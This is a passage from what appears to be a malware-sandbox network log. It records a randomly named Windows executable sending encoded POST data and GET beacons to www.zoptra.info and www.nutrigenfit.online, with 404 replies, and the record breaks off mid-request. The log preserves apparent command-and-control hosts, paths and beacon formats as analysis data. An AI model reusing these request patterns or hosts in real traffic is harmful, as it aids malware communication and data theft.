                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4a 55 73 2f 37 6f 32 37 6e 31 65 39 4a 5a 41 6a 58 4f 45 56 6c 54 2b 58 32 6f 76 33 67 6e 58 58 39 6c 74 52 55 48 37 6d 34 72 66 31 38 2f 65 33 37 61 59 4c 6f 4c 48 38 52 61 77 45 71 54 61 7a 42 68 64 44 43 4e 62 76 44 32 49 69 36 58 4e 64 52 6a 78 2b 62 41 6a 6d 2f 67 4a 65 38 65 78 51 4e 6d 43 70 35 79 51 35 6f 34 54 61 6e 48 6e 35 62 6b 61 67 68 31 5a 79 74 51 2f 38 66 67 62 6b 68 4b 54 4a 33 59 36 54 45 47 52 4f 46 41 74 34 75 5a 42 6e 45 6a 4d 53 32 78 75 76 4d 50 74 48 74 76 68 6b 4d 41 39 47 48 48 6a 53 69 72 67 72 76 78 39 66 46 2b 35 6a 54 57 5a 72 37 51 77 47 4c 73 53 63 4a 66 77 70 53 43 61 39 37 78 74 50 58 55 4a 77 64 47 77 3d
                                                                                                                      Data Ascii: sn0PLN=JUs/7o27n1e9JZAjXOEVlT+X2ov3gnXX9ltRUH7m4rf18/e37aYLoLH8RawEqTazBhdDCNbvD2Ii6XNdRjx+bAjm/gJe8exQNmCp5yQ5o4TanHn5bkagh1ZytQ/8fgbkhKTJ3Y6TEGROFAt4uZBnEjMS2xuvMPtHtvhkMA9GHHjSirgrvx9fF+5jTWZr7QwGLsScJfwpSCa97xtPXUJwdGw=
                                                                                                                      Nov 1, 2024 09:19:48.652123928 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:48 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.2.462925162.0.211.143803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:50.632992983 CET10883OUTPOST /icpx/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Origin: http://www.zoptra.info
                                                                                                                      Referer: http://www.zoptra.info/icpx/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4a 55 73 2f 37 6f 32 37 6e 31 65 39 4a 5a 41 6a 58 4f 45 56 6c 54 2b 58 32 6f 76 33 67 6e 58 58 39 6c 74 52 55 48 37 6d 34 72 58 31 38 71 43 33 36 35 41 4c 70 4c 48 38 50 4b 77 48 71 54 61 2b 42 68 6c 48 43 4e 48 2f 44 7a 55 69 37 32 74 64 58 52 5a 2b 41 51 6a 6d 79 41 4a 54 79 2b 78 2f 4e 6c 36 74 35 79 41 35 6f 34 54 61 6e 42 4c 35 53 56 61 67 73 56 5a 78 6b 77 2f 34 4a 51 61 35 68 4b 4b 38 33 59 2b 6c 46 33 78 4f 45 67 64 34 6f 71 35 6e 43 7a 4d 55 33 78 75 33 4d 50 70 6d 74 76 73 64 4d 41 67 6a 48 41 54 53 6a 74 4a 6d 71 6b 64 66 61 34 6f 6c 49 47 70 64 36 6e 55 6c 4b 65 62 68 48 71 67 68 4f 42 2b 78 38 32 64 48 53 57 5a 61 42 44 61 39 64 4c 70 43 30 63 44 47 4d 58 34 74 70 56 4d 35 59 72 45 74 46 6f 4f 30 6d 56 6b 49 7a 77 62 52 35 54 44 6d 46 73 6c 77 71 57 59 62 69 44 56 52 45 2b 62 45 38 74 4a 43 53 50 66 71 30 4c 6c 6d 6c 6b 57 69 6b 6a 56 6c 5a 6a 50 6b 61 6e 56 4b 38 52 45 46 65 4a 37 45 57 2b 38 47 46 44 45 56 45 44 58 2f 4f 51 43 57 31 75 4f 50 76 6d 4b 36 47 56 58 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=JUs/7o27n1e9JZAjXOEVlT+X2ov3gnXX9ltRUH7m4rX18qC365ALpLH8PKwHqTa+BhlHCNH/DzUi72tdXRZ+AQjmyAJTy+x/Nl6t5yA5o4TanBL5SVagsVZxkw/4JQa5hKK83Y+lF3xOEgd4oq5nCzMU3xu3MPpmtvsdMAgjHATSjtJmqkdfa4olIGpd6nUlKebhHqghOB+x82dHSWZaBDa9dLpC0cDGMX4tpVM5YrEtFoO0mVkIzwbR5TDmFslwqWYbiDVRE+bE8tJCSPfq0LlmlkWikjVlZjPkanVK8REFeJ7EW+8GFDEVEDX/OQCW1uOPvmK6GVX0Bu8A829Ki19Z5MbMbxuQ/H0PWC3EErRyFVxb/HS1vE7O+meCxKTacDjlh8WSVFwOSWgHoU9RJi8GA78D74Gftvl0Co8bjmUWDHW7pw//6BUxngvi/G3uceL/IroHYfSDBWm6wIbEtO90CciPu+PSbWvWhoOYjL3SAgQ5lYgJaYy+p1e2fNyzjWS1POJJgFw16DJpLN9nYEycOr+naSzNicR6ksFqnFSwPliC7HfR8pE/2JIQWUwvMonb7owVYJGHFu70tlkiMpUfyjBAImPMGWfjdccs0Isd5kTrR+ejDBGqoLcVQsaEgevJ8zoBMXgbz0fPYVsjyWKQGzr/sJdcXlT42Niiy5Mn/VlJSgnxzSpgbSkUTR9xdF/faHxnsPbK+eueHBrb7dQkaQ2GLKZ4ITPirQsm9EXW8OoUqHgA7Iotifw4ytvp0kJsfgYOnTwDEyI39J57EeHQ7CgPJAC4QwYaRPNQSZe8AUxjlfeG/h5ORr1N1/Agfm8Fg6yBvdS/plQHnXRc6y404aT1obijYBgB/hoNezDtreLG7xBaIJsAKHNE7+M8DR/eMDDhyVYbKDo1sbGODhAzg7CcfV+tZWcoeBbUdy+oJPe+OCaJ2+0Z3TGkT6PP7tnAHXYmgdTJalaKWB4pW45KcAw2FxQ/GTqVhgma5zet4 [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:19:51.281482935 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:51 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.462926162.0.211.143803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:53.180800915 CET528OUTGET /icpx/?sn0PLN=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:19:53.849731922 CET548INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:53 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.462927195.110.124.133803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:58.987238884 CET802OUTPOST /uhg3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Origin: http://www.nutrigenfit.online
                                                                                                                      Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4d 61 4d 32 2f 61 39 47 79 31 63 62 4f 4f 55 49 47 6a 43 77 4e 49 5a 49 2f 73 4a 6e 41 68 31 72 43 38 37 63 30 51 4c 6b 63 41 42 4c 4b 64 36 6d 75 55 61 52 5a 53 64 55 63 36 2f 2f 58 63 46 37 79 6a 66 71 6c 5a 74 79 67 6b 46 63 78 55 45 2f 4e 77 55 46 68 57 53 5a 58 35 39 77 39 75 45 56 36 44 42 69 69 43 2b 7a 6f 2b 65 79 7a 66 46 6d 41 4d 44 77 66 70 36 79 79 66 59 35 32 68 42 72 39 34 42 32 49 47 73 46 57 49 61 35 30 4e 74 72 70 6e 31 6b 64 69 67 79 48 4e 33 30 77 2b 52 6f 67 68 4d 6e 30 6d 6d 43 7a 47 45 54 42 76 48 59 34 4b 42 6b 49 35 72 2f 77 36 58 4e 58 6a 36 49 4e 77 3d 3d
                                                                                                                      Data Ascii: sn0PLN=MaM2/a9Gy1cbOOUIGjCwNIZI/sJnAh1rC87c0QLkcABLKd6muUaRZSdUc6//XcF7yjfqlZtygkFcxUE/NwUFhWSZX59w9uEV6DBiiC+zo+eyzfFmAMDwfp6yyfY52hBr94B2IGsFWIa50Ntrpn1kdigyHN30w+RoghMn0mmCzGETBvHY4KBkI5r/w6XNXj6INw==
                                                                                                                      Nov 1, 2024 09:19:59.824979067 CET367INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.462928195.110.124.133803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:01.658086061 CET822OUTPOST /uhg3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Origin: http://www.nutrigenfit.online
                                                                                                                      Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4d 61 4d 32 2f 61 39 47 79 31 63 62 4f 76 45 49 57 77 71 77 46 49 5a 58 77 4d 4a 6e 5a 78 31 76 43 38 33 63 30 53 36 2f 64 32 52 4c 4b 38 4b 6d 76 51 4f 52 56 79 64 55 53 61 2f 41 5a 38 45 33 79 69 6a 39 6c 64 78 79 67 6c 68 63 78 56 30 2f 4e 42 55 45 6e 47 53 4d 66 5a 39 79 6a 65 45 56 36 44 42 69 69 44 61 56 6f 36 79 79 7a 76 31 6d 41 70 33 7a 58 4a 36 7a 31 66 59 35 39 42 42 76 39 34 41 52 49 44 52 75 57 4b 69 35 30 4e 64 72 6f 7a 42 6a 54 69 67 30 61 64 32 65 36 64 6f 48 6d 67 74 76 33 31 44 73 32 32 51 71 4e 4a 4b 43 70 37 67 7a 61 35 50 4d 74 39 65 35 61 67 48 42 57 34 7a 2f 34 58 41 48 6f 58 39 53 63 72 41 65 58 64 48 30 59 43 77 3d
                                                                                                                      Data Ascii: sn0PLN=MaM2/a9Gy1cbOvEIWwqwFIZXwMJnZx1vC83c0S6/d2RLK8KmvQORVydUSa/AZ8E3yij9ldxyglhcxV0/NBUEnGSMfZ9yjeEV6DBiiDaVo6yyzv1mAp3zXJ6z1fY59BBv94ARIDRuWKi50NdrozBjTig0ad2e6doHmgtv31Ds22QqNJKCp7gza5PMt9e5agHBW4z/4XAHoX9ScrAeXdH0YCw=
                                                                                                                      Nov 1, 2024 09:20:02.418484926 CET367INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:02 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.462929195.110.124.133803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:04.213329077 CET10904OUTPOST /uhg3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Origin: http://www.nutrigenfit.online
                                                                                                                      Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4d 61 4d 32 2f 61 39 47 79 31 63 62 4f 76 45 49 57 77 71 77 46 49 5a 58 77 4d 4a 6e 5a 78 31 76 43 38 33 63 30 53 36 2f 64 32 5a 4c 4c 4b 65 6d 75 79 6d 52 55 79 64 55 61 36 2f 42 5a 38 45 36 79 6a 4b 56 6c 61 34 4a 67 6e 70 63 78 33 73 2f 4c 79 4d 45 75 47 53 4d 54 35 39 2f 39 75 45 4d 36 44 52 75 69 43 71 56 6f 36 79 79 7a 70 5a 6d 4a 63 44 7a 52 4a 36 79 79 66 59 31 32 68 42 58 39 37 78 75 49 43 42 59 52 35 71 35 33 70 35 72 75 47 31 6a 62 69 67 32 5a 64 32 47 36 63 55 59 6d 67 68 4a 33 30 6d 33 32 30 4d 71 4f 34 54 32 39 4b 67 49 41 4a 72 30 79 36 71 71 57 68 50 43 65 35 4f 47 34 43 55 64 38 30 4e 48 59 72 73 57 4d 2b 72 6f 4c 32 46 75 65 52 6a 6d 50 46 77 4e 6e 59 75 41 48 77 55 69 4e 56 4e 50 78 4c 32 33 50 52 46 65 6c 75 39 36 61 7a 78 50 68 6d 61 4c 6e 64 52 77 62 64 39 66 6a 6a 4c 4e 64 70 79 79 7a 4b 50 62 78 78 44 76 64 44 58 79 4d 58 67 71 75 46 31 48 49 56 69 76 6d 36 65 51 38 76 31 2f 79 39 6c 59 77 38 38 62 4a 30 6e 32 2f 61 4d 36 65 38 6e 62 4c 35 58 39 33 4c 4a [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=MaM2/a9Gy1cbOvEIWwqwFIZXwMJnZx1vC83c0S6/d2ZLLKemuymRUydUa6/BZ8E6yjKVla4Jgnpcx3s/LyMEuGSMT59/9uEM6DRuiCqVo6yyzpZmJcDzRJ6yyfY12hBX97xuICBYR5q53p5ruG1jbig2Zd2G6cUYmghJ30m320MqO4T29KgIAJr0y6qqWhPCe5OG4CUd80NHYrsWM+roL2FueRjmPFwNnYuAHwUiNVNPxL23PRFelu96azxPhmaLndRwbd9fjjLNdpyyzKPbxxDvdDXyMXgquF1HIVivm6eQ8v1/y9lYw88bJ0n2/aM6e8nbL5X93LJuedYuKvWhfEongmfOuX+TPvKwnAdKwjDrwKIDebni7Yrr8VWT1eoE4TS+I6bKTVt1W3yAruQfoRDmdq6F9h5s19rwIitzu8ILrw8I7/xqnYXxrPi0ln78SiGKdFqoRXKrDujFAMN19tBpm+S0jr38kB0pSblxpFVUCQYa0b2BlVMSVL3j2tviILX8i6Aqxb2Tx/iWDX+BxtK6rNYOgn1r76P3sTkuAMrOwCpQkQBuyqfE+ZkrTzoYhIuyPya/SL0XF6vcYugBrT6NqhB7UjHFLGB46wJmgg77kJLjPpGRb6P/uf0jEMUhx0j0EIrKfdlP/qDDmESq/+G2xiVFsZ5dKJksJgwbA7ThZVp4WqoVzJJvGH/26unFqe1Q37tVKq7tS8akGpKmvMFsxqKTIPJGRVNtGbJpqAeThRyptQSGdOGHIK3e7K57U4s9rNLv+deUQ9flkUxLsrLCr4VL/Ll9/7kJSVbT1lzIwFP6Cdzn+pMxIlMNcoWPr9aNJ94lNSrzHrlXR3tTBYLs01F0qhj1SlRBjIwSPRCCHse4Q2MC6fz73eIIOj29qe3+BcGP94SP7C7qMo1B+SMiyZ/6ajlA3+a8qhJkXwr/1eynXuu03NHdgBnVi70nnOjfTj7TYmT4RRk06IkZq1csGKdVqS5uUXJWmtgWeUKA6 [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:20:05.035243988 CET367INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:04 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.2.462930195.110.124.133803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:06.757955074 CET535OUTGET /uhg3/?sn0PLN=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
